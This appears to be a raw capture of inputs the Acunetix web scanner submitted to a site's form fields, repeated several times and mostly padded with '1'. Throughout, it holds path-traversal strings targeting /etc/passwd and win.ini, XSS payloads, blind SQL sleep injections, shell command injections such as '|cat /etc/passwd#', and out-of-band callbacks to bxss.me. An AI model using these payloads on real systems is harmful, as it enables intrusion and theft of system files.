1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

"|"ld

1

[url=http://www.acunetix.com]website security[/url]

'

qNn3mPuS'))

1

1

1

1

/etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1_LgRFK <ScRiPt >prompt(930755)</ScRiPt>

"

1

1

-1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

'

1

1

${@print(md5(acunetix_wvs_security_test))}

1

-1)

1

1

http://hitTVPIzq1ZWQ.bxss.me/

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1

${@print(md5(acunetix_wvs_security_test))}\

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1))

acunetix_wvs_invalid_filename

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

||cat /etc/passwd

3TguSrHz'

1

1

http://www.acunetix.tst

comments

1

'"

1

PK31V48s')

&dir

1'"()&%<ScRiPt >prompt(954907)</ScRiPt>

1

comments

1

6GTuOAWc'))

<!--

1

file:///etc/passwd

'"()&%<ScRiPt >prompt(937416)</ScRiPt>

'&dir&'

1

comments/.

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1_995600

1

1

1

"&dir&"

WEB-INF/web.xml

1

1

1

WEB-INF\web.xml

|dir

acu3809\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3809

1

1

1

../../../../../../../../../../windows/win.ini

'|dir

acux3618\xc0\xbez1\xc0\xbcz2a\x90bcxuca3618

1

1

../../../../../../../../../../boot.ini

1

"|dir

1<ScRiPt >prompt(978552)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1<script>prompt(952210)</script>

1

1

1

1

1<ScRiPt >prompt(993986)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?920710></ScRiPt>

1

................windowswin.ini

1

1

1<ScRiPt >prompt(960839)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<video><source onerror="javascript:prompt(958389)">

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(927591)"></g></svg>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<div style=width:expression(prompt(936768))>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<iframe src='data:text/html

response.write(9509583*9314062)

1

1

1

'+response.write(9509583*9314062)+'

1<body onload=prompt(949728)>

&cat /etc/passwd&

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

../../../../../../../../../../etc/passwd

"+response.write(9509583*9314062)+"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(996554)>

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF\web.xml

1

1<img src=xyz OnErRor=prompt(994381)>

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd.jpg

1

1<img/src=">" onerror=alert(951538)>

1

cat /etc/passwd

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<ScRiPt%20>prompt(934916)</sCripT>

1

`cat /etc/passwd`

-1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

${99345+100158}

1

1&lt

-1)

|cat /etc/passwd#

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

\xf6<img acu onmouseover=prompt(943946) //\xf6>

1

1some_inexistent_file_with_long_name%00.jpg

-1))

'|'ld

1&n995268=v964433

)

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<input autofocus onfocus=prompt(919661)>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

ad6hT5mx'

1

"|"ld

!(()&&!|*|*|

1

<a href='http://www.acunetix.com'>website security</a>

'"()

1

/etc/passwd

testasp.vulnweb.com

8KS04GeB')

^(#$!@#$)(()))******

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

81YvZwq4'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

'

1_xh8JH <ScRiPt >prompt(927231)</ScRiPt>

1

'

1

1

1

-1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

"

1

-1)

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

1

1

acunetix_wvs_invalid_filename

-1))

1

1

http://hit8pORhziHjl.bxss.me/

${@print(md5(acunetix_wvs_security_test))}\

&dir

1

t0WbjNQT'

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

1

1

file:///etc/passwd

1

1

'&dir&'

7JkKBRu0')

comments

1

1

1

'"

/\../\../\../\../\../\../\../etc/passwd

1

s5A6JHEI'))

1'"()&%<ScRiPt >prompt(978445)</ScRiPt>

"&dir&"

comments/.

1

WEB-INF/web.xml

<!--

1

1

|dir

1

'"()&%<ScRiPt >prompt(993790)</ScRiPt>

1

1

WEB-INF\web.xml

1

1

1

'|dir

1_952155

1

1

../../../../../../../../../../windows/win.ini

"|dir

1

1

acu10250\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10250

1

1

../../../../../../../../../../boot.ini

1

1

1

1

acux8247\xc0\xbez1\xc0\xbcz2a\x90bcxuca8247

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(970213)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

................windowswin.ini

1<script>prompt(902955)</script>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(948577)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?983154></ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(920193)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(955716)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(928372)"></g></svg>

1

1

WEB-INF/web.xml

1

1

response.write(9237470*9841365)

1

1<div style=width:expression(prompt(922702))>

WEB-INF\web.xml

1

'+response.write(9237470*9841365)+'

1

1

1<iframe src='data:text/html

"+response.write(9237470*9841365)+"

&cat /etc/passwd&

1

1

1

1<body onload=prompt(946032)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(954697)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1<img src=xyz OnErRor=prompt(946911)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

cat /etc/passwd

-1

../../../../../../../../../../etc/passwd.jpg

1

1<img/src=">" onerror=alert(908614)>

1

1

1

${100448+99578}

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1)

1

1<ScRiPt%20>prompt(920184)</sCripT>

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

1

1&lt

1&n965883=v914460

1

1

)

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

'|'ld

1ScdM5Er'

\xf6<img acu onmouseover=prompt(928832) //\xf6>

1

1

1

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

zx5fMOeW')

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<input autofocus onfocus=prompt(999148)>

1

'"()

1

^(#$!@#$)(()))******

testasp.vulnweb.com

http://testasp.vulnweb.com/t/xss.html?%00.jpg

<a href='http://www.acunetix.com'>website security</a>

VzS41Byp'))

'

/etc/passwd

1

1

1

[url=http://www.acunetix.com]website security[/url]

1

'

1

-1

1

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1_tg1rU <ScRiPt >prompt(934228)</ScRiPt>

"

1

1

-1)

${@print(md5(acunetix_wvs_security_test))}

http://hitEEhDgOaLUk.bxss.me/

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

||cat /etc/passwd

acunetix_wvs_invalid_filename

-1))

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

&dir

comments

3Dv5uYMw'

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

'"

http://www.acunetix.tst

'&dir&'

comments

1

fYqmYkyE')

1

1

file:///etc/passwd

1'"()&%<ScRiPt >prompt(943569)</ScRiPt>

<!--

1

"&dir&"

comments/.

gguLV0T4'))

1

/\../\../\../\../\../\../\../etc/passwd

1

'"()&%<ScRiPt >prompt(918002)</ScRiPt>

1

1

|dir

1

WEB-INF/web.xml

1

1

1

1_952505

1

1

'|dir

1

1

WEB-INF\web.xml

acu3520\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3520

1

1

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

acux2742\xc0\xbez1\xc0\xbcz2a\x90bcxuca2742

1

1<ScRiPt >prompt(985517)</ScRiPt>

1

1

../../../../../../../../../../boot.ini

1

../../../../../../../../../../windows/win.ini.jpg

1<script>prompt(935676)</script>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(954553)</ScRiPt>

1

1

1

................windowswin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?910405></ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(952300)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(921388)">

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(946966)"></g></svg>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(975314))>

1

1

1

response.write(9979166*9841640)

1<iframe src='data:text/html

WEB-INF/web.xml

1

'+response.write(9979166*9841640)+'

1

1

1<body onload=prompt(964887)>

&cat /etc/passwd&

WEB-INF\web.xml

1

"+response.write(9979166*9841640)+"

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(979094)>

'&cat /etc/passwd&'

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=xyz OnErRor=prompt(953943)>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

"&cat /etc/passwd&"

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd.jpg

1

1<img/src=">" onerror=alert(994773)>

-1

1

cat /etc/passwd

1

1

1

-1)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

${100196+100183}

1<ScRiPt%20>prompt(951871)</sCripT>

`cat /etc/passwd`

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

-1))

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&n956108=v913077

1

1&lt

|cat /etc/passwd#

1some_inexistent_file_with_long_name%00.jpg

Kl392An2'

1

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

)

\xf6<img acu onmouseover=prompt(986632) //\xf6>

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

d6CFRkZS')

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1<input autofocus onfocus=prompt(926701)>

"|"ld

testasp.vulnweb.com

pval8BxJ'))

^(#$!@#$)(()))******

'"()

'

/etc/passwd

1

<a href='http://www.acunetix.com'>website security</a>

1

1

1

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

"

1

[url=http://www.acunetix.com]website security[/url]

'

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

${@print(md5(acunetix_wvs_security_test))}

-1)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1_56xRs <ScRiPt >prompt(927043)</ScRiPt>

"

1

1

-1))

1

1

${@print(md5(acunetix_wvs_security_test))}\

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

||cat /etc/passwd

1

eDDwzEtw'

http://hitRHI8ch7iwR.bxss.me/

1

1

acunetix_wvs_invalid_filename

1

&dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

lQkopECP')

1

1

1

'&dir&'

comments

1

file:///etc/passwd

1

KWRrzsND'))

1

http://www.acunetix.tst

1

"&dir&"

comments

'"

/\../\../\../\../\../\../\../etc/passwd

1'"()&%<ScRiPt >prompt(920990)</ScRiPt>

1

1

1

1

|dir

<!--

comments/.

1

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(996327)</ScRiPt>

'|dir

1

1

1

1

1_983874

WEB-INF\web.xml

1

"|dir

1

1

1

1

1

../../../../../../../../../../windows/win.ini

acu8627\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8627

1

1

1

1

../../../../../../../../../../boot.ini

acux4922\xc0\xbez1\xc0\xbcz2a\x90bcxuca4922

1

1

1

1

1<ScRiPt >prompt(988641)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1<script>prompt(997146)</script>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(927142)</ScRiPt>

1

1

................windowswin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?987630></ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(963888)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<video><source onerror="javascript:prompt(943037)">

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(921936)"></g></svg>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

response.write(9646801*9049080)

1<div style=width:expression(prompt(938921))>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

&cat /etc/passwd&

1<iframe src='data:text/html

1

'+response.write(9646801*9049080)+'

1

'&cat /etc/passwd&'

1

1<body onload=prompt(929185)>

"+response.write(9646801*9049080)+"

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(931030)>

../../../../../../../../../../etc/passwd

1

"&cat /etc/passwd&"

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(969909)>

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1

-1

1

SomeCustomInjectedHeader:injected_by_wvs

1<img/src=">" onerror=alert(983767)>

1

1

../../../../../../../../../../etc/passwd.jpg

1

`cat /etc/passwd`

-1)

1

1

1

1<ScRiPt%20>prompt(994300)</sCripT>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

${99022+99504}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

|cat /etc/passwd#

-1))

1

1&lt

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n981299=v904334

1

1some_inexistent_file_with_long_name%00.jpg

YVtgS6d6'

1

'|'ld

1

\xf6<img acu onmouseover=prompt(968486) //\xf6>

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

7UahA1da')

"|"ld

1<input autofocus onfocus=prompt(985477)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

!(()&&!|*|*|

testasp.vulnweb.com

'

1

3kZER72h'))

<a href='http://www.acunetix.com'>website security</a>

'"()

1

/etc/passwd

^(#$!@#$)(()))******

1

1

"

1

-1

[url=http://www.acunetix.com]website security[/url]

1

'

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}

-1)

1

1_9fvD6 <ScRiPt >prompt(995987)</ScRiPt>

"

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

comments

${@print(md5(acunetix_wvs_security_test))}\

-1))

1

http://hitND94PjHQtU.bxss.me/

||cat /etc/passwd

1

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

cEr0my9a'

1

comments

1

&dir

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

USiXpyEM')

1

comments/.

1

1

http://www.acunetix.tst

0KdXdeSN'))

'&dir&'

1

1

file:///etc/passwd

'"

1

1'"()&%<ScRiPt >prompt(952022)</ScRiPt>

1

1

1

"&dir&"

1

/\../\../\../\../\../\../\../etc/passwd

<!--

1

1

'"()&%<ScRiPt >prompt(907553)</ScRiPt>

|dir

WEB-INF/web.xml

1

1

1

1

1

1_956781

WEB-INF\web.xml

'|dir

1

1

1

../../../../../../../../../../windows/win.ini

1

"|dir

1

1

../../../../../../../../../../boot.ini

acu9807\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9807

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux7792\xc0\xbez1\xc0\xbcz2a\x90bcxuca7792

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(995772)</ScRiPt>

1

................windowswin.ini

1

1

1<script>prompt(988956)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(973766)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?998352></ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(998586)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(947286)">

1

response.write(9211963*9059230)

1

1

1

&cat /etc/passwd&

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(999052)"></g></svg>

'+response.write(9211963*9059230)+'

WEB-INF/web.xml

1

1

1

'&cat /etc/passwd&'

1<div style=width:expression(prompt(962078))>

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

WEB-INF\web.xml

"+response.write(9211963*9059230)+"

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1<iframe src='data:text/html

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

1<body onload=prompt(960826)>

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1

-1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(917317)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1

1

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1<img src=xyz OnErRor=prompt(998012)>

${100202+99285}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

1

-1))

1

1

1some_inexistent_file_with_long_name%00.jpg

1<img/src=">" onerror=alert(966006)>

1

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1&n933985=v991268

evAlFzNv'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1<ScRiPt%20>prompt(914522)</sCripT>

)

"|"ld

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

'"()

qxuinO8e')

testasp.vulnweb.com

1&lt

1

!(()&&!|*|*|

/etc/passwd

1

1

yOwGrjy1'))

1

1

\xf6<img acu onmouseover=prompt(960605) //\xf6>

'

^(#$!@#$)(()))******

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

'

-1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1<input autofocus onfocus=prompt(996713)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

1

1

"

-1)

1

1

<a href='http://www.acunetix.com'>website security</a>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

||cat /etc/passwd

acunetix_wvs_invalid_filename

1

-1))

${@print(md5(acunetix_wvs_security_test))}

[url=http://www.acunetix.com]website security[/url]

http://hitqpd7nWtwNs.bxss.me/

comments

1

1

zwAoga5d'

&dir

1

1_mNMik <ScRiPt >prompt(925465)</ScRiPt>

${@print(md5(acunetix_wvs_security_test))}\

file:///etc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

E77OBKQl')

1

'&dir&'

1

/\../\../\../\../\../\../\../etc/passwd

1

http://www.acunetix.tst

comments/.

cDPU6CIO'))

1

1

"&dir&"

1

1

WEB-INF/web.xml

'"

1

1

1

1

<!--

1

|dir

1

WEB-INF\web.xml

1'"()&%<ScRiPt >prompt(993360)</ScRiPt>

1

1

1

1

1

'|dir

../../../../../../../../../../windows/win.ini

'"()&%<ScRiPt >prompt(997772)</ScRiPt>

1

1

1

1

1

"|dir

1_928360

../../../../../../../../../../boot.ini

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acu2810\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2810

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acux4773\xc0\xbez1\xc0\xbcz2a\x90bcxuca4773

1

1

1

................windowswin.ini

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(918786)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<script>prompt(932430)</script>

1

1

1<ScRiPt >prompt(957615)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?985646></ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1<ScRiPt >prompt(979641)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(946954)">

1

WEB-INF/web.xml

response.write(9022876*9943944)

WEB-INF\web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(977012)"></g></svg>

1

1

1

1<div style=width:expression(prompt(954946))>

1

'+response.write(9022876*9943944)+'

&cat /etc/passwd&

1

1

1

1<iframe src='data:text/html

1

"+response.write(9022876*9943944)+"

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<body onload=prompt(973773)>

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

../../../../../../../../../../etc/passwd

1

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(967420)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

cat /etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd.jpg

1<img src=xyz OnErRor=prompt(976545)>

-1

1

1

`cat /etc/passwd`

${100283+99443}

1

1

1<img/src=">" onerror=alert(992221)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1)

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

|cat /etc/passwd#

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<ScRiPt%20>prompt(902623)</sCripT>

-1))

1some_inexistent_file_with_long_name%00.jpg

1

1&n985961=v933501

'|'ld

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

